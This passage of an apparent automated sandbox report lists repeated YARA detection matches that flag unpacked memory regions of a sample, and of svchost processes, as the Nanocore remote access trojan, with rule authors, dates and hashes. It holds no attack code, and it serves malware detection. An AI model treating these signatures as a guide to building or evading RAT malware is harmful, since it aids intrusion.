            Source: 10.3.s9SWgUgyO5.exe.48edd1f.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.481b13f.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.481b13f.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.7000000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.7000000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.71e0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.71e0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.47ae62e.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.47ae62e.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.60a4629.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.60a4629.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6fd0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6fd0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.4823f6e.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.4823f6e.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.48aa432.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.48aa432.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.48aa432.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.6fe0000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6fe0000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.2d14b78.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.2d14b78.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6ff0000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6ff0000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.7150000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.7150000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.71b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.71b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6fe0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6fe0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.483239e.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.483239e.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 14.0.svchost.exe.49a0da0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 14.0.svchost.exe.49a0da0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 14.0.svchost.exe.49a0da0.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.48af268.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.48af268.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.3.s9SWgUgyO5.exe.48edd1f.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.3cfd041.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.3cfd041.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.0.svchost.exe.5110da0.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.0.svchost.exe.5110da0.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.0.svchost.exe.5110da0.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.6fc0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6fc0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.2d20dc0.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.2d20dc0.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.7180000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.7180000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.4823f6e.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.4823f6e.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.48af268.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.48af268.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.0.svchost.exe.5110da0.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.0.svchost.exe.5110da0.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.0.svchost.exe.5110da0.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.7000000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.7000000.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.7150000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.7150000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.48b3891.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
